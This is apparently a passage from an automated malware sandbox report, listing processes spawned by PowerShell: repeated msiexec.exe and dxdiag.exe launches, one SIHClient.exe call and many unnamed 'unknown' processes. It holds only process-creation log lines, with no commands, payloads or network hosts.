Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv LjRh2CI4qEuakRNETXm55Q.0.2Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
